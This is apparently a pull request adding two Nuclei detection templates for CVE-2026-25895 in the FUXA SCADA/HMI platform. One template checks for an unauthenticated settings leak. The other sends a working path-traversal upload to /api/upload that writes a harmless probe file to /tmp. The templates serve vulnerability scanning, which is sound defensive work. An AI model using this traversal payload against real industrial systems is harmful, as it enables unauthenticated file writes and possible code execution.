### PR TITLE
Add CVE-2026-25895 FUXA templates (info-leak + file-write)

### DIFF
--- a/http/cves/2026/CVE-2026-25895-file-write.yaml
+++ b/http/cves/2026/CVE-2026-25895-file-write.yaml
@@ -1,0 +1,39 @@
+id: CVE-2026-25895-file-write
+
+info:
+  name: FUXA Unauthenticated Arbitrary File Write (CVE-2026-25895)
+  author: natie17
+  severity: critical
+  description: FUXA /api/upload allows unauthenticated arbitrary file write via path traversal.
+  tags: cve,cve2026,fuxa,scada,rce,file-write
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/upload"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      {
+        "resource": {
+          "name": "nuclei-probe",
+          "fullPath": "nuclei-probe",
+          "type": "bin",
+          "data": "bnVjbGVpLW9r"
+        },
+        "destination": "a/../../../../../../../../../../../..//tmp"
+      }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "location"
+          - "resources"
+        condition: and

--- a/http/cves/2026/CVE-2026-25895-info-leak.yaml
+++ b/http/cves/2026/CVE-2026-25895-info-leak.yaml
@@ -1,0 +1,31 @@
+id: CVE-2026-25895-info-leak
+
+info:
+  name: FUXA Unauthenticated Settings Leak (CVE-2026-25895)
+  author: natie17
+  severity: high
+  description: FUXA /api/settings leaks internal configuration without authentication.
+  tags: cve,cve2026,fuxa,scada,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/settings"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "appDir"
+          - "workDir"
+          - "uploadFileDir"
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header


### PR DESCRIPTION
## Proposed changes

Added two Nuclei templates for CVE-2026-25895, a critical vulnerability in FUXA <= 1.2.9 (SCADA/HMI platform).

The vulnerability chain consists of two issues:
1. `/api/settings` is accessible without authentication, leaking internal server paths and configuration (high)
2. `/api/upload` allows unauthenticated arbitrary file write via path traversal, leading to RCE (critical)

### Proof

Both templates were tested against a clean install of FUXA 1.2.9 using the official Docker image (`frangoteam/fuxa:1.2.9`).

- `CVE-2026-25895-info-leak.yaml` — confirmed detection of unauthenticated `/api/settings` response containing `appDir`, `workDir`, and `uploadFileDir` fields
- `CVE-2026-25895-file-write.yaml` — confirmed detection of unauthenticated arbitrary file write via `/api/upload` path traversal (HTTP 200 with `location` field in response)

Full vulnerability analysis and step-by-step exploitation writeup:
https://natie.tistory.com/102

References:
- PoC: https://github.com/Hann1bl3L3ct3r/FUXAPWN
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-25895

## Checklist

- [ ] Pull request is created against the dev branch
- [x] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [x] I have added tests that prove my fix is effective or that my feature works
- [x] I have added necessary documentation (if appropriate)